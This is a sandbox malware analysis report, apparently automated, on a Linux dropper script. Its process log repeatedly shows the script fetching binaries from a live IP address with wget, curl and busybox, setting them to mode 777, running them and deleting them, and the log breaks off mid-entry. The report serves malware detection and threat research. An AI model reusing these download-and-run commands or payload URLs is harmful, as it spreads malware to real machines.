Malware Analysis Report

2025-05-28 20:52

Sample ID 241021-ce7sfstala
Target f542050a645c72e971d62a3493d03ae4.bin
SHA256 b81f5bd915e3f48dd35b352aab2a3c6188f31172496eb838d378a7f89eebd3cf
Tags
defense_evasion antivm discovery
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

b81f5bd915e3f48dd35b352aab2a3c6188f31172496eb838d378a7f89eebd3cf

Threat Level: Shows suspicious behavior

The file f542050a645c72e971d62a3493d03ae4.bin was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion antivm discovery

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

Reads runtime system information

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-21 02:00

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-21 02:00

Reported

2024-10-21 02:02

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

20s

Max time network

129s

Command Line

[/tmp/90d47b9bc105b4b807234ad1c7410b2eff5c6fc38096f3ede782edefffdcc09c.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe /tmp/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe N/A
N/A /tmp/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5 /tmp/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5 N/A
N/A /tmp/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP /tmp/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP N/A
N/A /tmp/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX /tmp/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX N/A
N/A /tmp/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe /tmp/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe N/A
N/A /tmp/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf /tmp/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf N/A
N/A /tmp/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0 /tmp/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0 N/A
N/A /tmp/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE /tmp/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE N/A
N/A /tmp/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq /tmp/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq N/A
N/A /tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC /tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC N/A
N/A /tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH /tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH N/A
N/A /tmp/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l /tmp/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l N/A
N/A /tmp/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1 /tmp/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1 N/A
N/A /tmp/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP /tmp/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP N/A
N/A /tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC /tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC N/A
N/A /tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH /tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH N/A
N/A /tmp/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l /tmp/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l N/A
N/A /tmp/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1 /tmp/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1 N/A
N/A /tmp/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP /tmp/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP N/A
N/A /tmp/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe /tmp/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe N/A
N/A /tmp/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5 /tmp/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5 N/A
N/A /tmp/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP /tmp/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP N/A
N/A /tmp/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX /tmp/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX N/A
N/A /tmp/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe /tmp/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe N/A
N/A /tmp/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf /tmp/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf N/A
N/A /tmp/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0 /tmp/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0 N/A
N/A /tmp/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE /tmp/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE N/A
N/A /tmp/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq /tmp/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l /usr/bin/curl N/A
File opened for modification /tmp/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1 /usr/bin/curl N/A
File opened for modification /tmp/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP /usr/bin/curl N/A
File opened for modification /tmp/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX /usr/bin/curl N/A
File opened for modification /tmp/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe /usr/bin/curl N/A
File opened for modification /tmp/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l /usr/bin/curl N/A
File opened for modification /tmp/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1 /usr/bin/curl N/A
File opened for modification /tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH /usr/bin/curl N/A
File opened for modification /tmp/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe /usr/bin/curl N/A
File opened for modification /tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC /usr/bin/curl N/A
File opened for modification /tmp/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX /usr/bin/curl N/A
File opened for modification /tmp/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq /usr/bin/curl N/A
File opened for modification /tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC /usr/bin/curl N/A
File opened for modification /tmp/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP /usr/bin/curl N/A
File opened for modification /tmp/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe /usr/bin/curl N/A
File opened for modification /tmp/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP /usr/bin/curl N/A
File opened for modification /tmp/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE /usr/bin/curl N/A
File opened for modification /tmp/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP /usr/bin/curl N/A
File opened for modification /tmp/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE /usr/bin/curl N/A
File opened for modification /tmp/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5 /usr/bin/curl N/A
File opened for modification /tmp/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe /usr/bin/curl N/A
File opened for modification /tmp/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0 /usr/bin/curl N/A
File opened for modification /tmp/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5 /usr/bin/curl N/A
File opened for modification /tmp/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq /usr/bin/curl N/A
File opened for modification /tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH /usr/bin/curl N/A
File opened for modification /tmp/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf /usr/bin/curl N/A
File opened for modification /tmp/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf /usr/bin/curl N/A
File opened for modification /tmp/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0 /usr/bin/curl N/A

Processes

/tmp/90d47b9bc105b4b807234ad1c7410b2eff5c6fc38096f3ede782edefffdcc09c.sh

[/tmp/90d47b9bc105b4b807234ad1c7410b2eff5c6fc38096f3ede782edefffdcc09c.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.84.230/bins/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

/bin/chmod

[chmod 777 TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

/tmp/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe

[./TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

/bin/rm

[rm TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

/usr/bin/wget

[wget http://87.120.84.230/bins/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5]

/bin/chmod

[chmod 777 1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5]

/tmp/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5

[./1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5]

/bin/rm

[rm 1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5]

/usr/bin/wget

[wget http://87.120.84.230/bins/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP]

/bin/chmod

[chmod 777 IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP]

/tmp/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP

[./IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP]

/bin/rm

[rm IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP]

/usr/bin/wget

[wget http://87.120.84.230/bins/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX]

/bin/chmod

[chmod 777 S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX]

/tmp/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX

[./S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX]

/bin/rm

[rm S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX]

/usr/bin/wget

[wget http://87.120.84.230/bins/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe]

/bin/chmod

[chmod 777 Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe]

/tmp/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe

[./Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe]

/bin/rm

[rm Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe]

/usr/bin/wget

[wget http://87.120.84.230/bins/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf]

/bin/chmod

[chmod 777 uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf]

/tmp/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf

[./uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf]

/bin/rm

[rm uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf]

/usr/bin/wget

[wget http://87.120.84.230/bins/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0]

/bin/chmod

[chmod 777 miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0]

/tmp/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0

[./miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0]

/bin/rm

[rm miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0]

/usr/bin/wget

[wget http://87.120.84.230/bins/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE]

/bin/chmod

[chmod 777 59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE]

/tmp/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE

[./59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE]

/bin/rm

[rm 59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE]

/usr/bin/wget

[wget http://87.120.84.230/bins/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq]

/bin/chmod

[chmod 777 afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq]

/tmp/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq

[./afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq]

/bin/rm

[rm afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq]

/usr/bin/wget

[wget http://87.120.84.230/bins/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/bin/chmod

[chmod 777 Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC

[./Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/bin/rm

[rm Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/usr/bin/wget

[wget http://87.120.84.230/bins/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/bin/chmod

[chmod 777 Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH

[./Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/bin/rm

[rm Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/usr/bin/wget

[wget http://87.120.84.230/bins/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/bin/chmod

[chmod 777 fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/tmp/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l

[./fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/bin/rm

[rm fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/usr/bin/wget

[wget http://87.120.84.230/bins/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/bin/chmod

[chmod 777 I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/tmp/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1

[./I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/bin/rm

[rm I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/usr/bin/wget

[wget http://87.120.84.230/bins/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/bin/chmod

[chmod 777 he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/tmp/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP

[./he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/bin/rm

[rm he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/usr/bin/wget

[wget http://87.120.84.230/bins/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/bin/chmod

[chmod 777 Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC

[./Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/bin/rm

[rm Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/usr/bin/wget

[wget http://87.120.84.230/bins/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/bin/chmod

[chmod 777 Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH

[./Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/bin/rm

[rm Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/usr/bin/wget

[wget http://87.120.84.230/bins/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/bin/chmod

[chmod 777 fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/tmp/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l

[./fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/bin/rm

[rm fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/usr/bin/wget

[wget http://87.120.84.230/bins/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/bin/chmod

[chmod 777 I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/tmp/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1

[./I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/bin/rm

[rm I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/usr/bin/wget

[wget http://87.120.84.230/bins/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/bin/chmod

[chmod 777 he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/tmp/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP

[./he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/bin/rm

[rm he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/usr/bin/wget

[wget http://87.120.84.230/bins/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

/bin/chmod

[chmod 777 TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

/tmp/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe

[./TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

/bin/rm

[rm TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

/usr/bin/wget

[wget http://87.120.84.230/bins/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5]

/bin/chmod

[chmod 777 1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5]

/tmp/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5

[./1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5]

/bin/rm

[rm 1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5]

/usr/bin/wget

[wget http://87.120.84.230/bins/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP]

/bin/chmod

[chmod 777 IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP]

/tmp/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP

[./IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP]

/bin/rm

[rm IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP]

/usr/bin/wget

[wget http://87.120.84.230/bins/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX]

/bin/chmod

[chmod 777 S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX]

/tmp/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX

[./S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX]

/bin/rm

[rm S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX]

/usr/bin/wget

[wget http://87.120.84.230/bins/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe]

/bin/chmod

[chmod 777 Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe]

/tmp/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe

[./Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe]

/bin/rm

[rm Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe]

/usr/bin/wget

[wget http://87.120.84.230/bins/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf]

/bin/chmod

[chmod 777 uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf]

/tmp/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf

[./uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf]

/bin/rm

[rm uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf]

/usr/bin/wget

[wget http://87.120.84.230/bins/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0]

/bin/chmod

[chmod 777 miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0]

/tmp/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0

[./miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0]

/bin/rm

[rm miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0]

/usr/bin/wget

[wget http://87.120.84.230/bins/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE]

/bin/chmod

[chmod 777 59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE]

/tmp/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE

[./59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE]

/bin/rm

[rm 59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE]

/usr/bin/wget

[wget http://87.120.84.230/bins/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq]

/bin/chmod

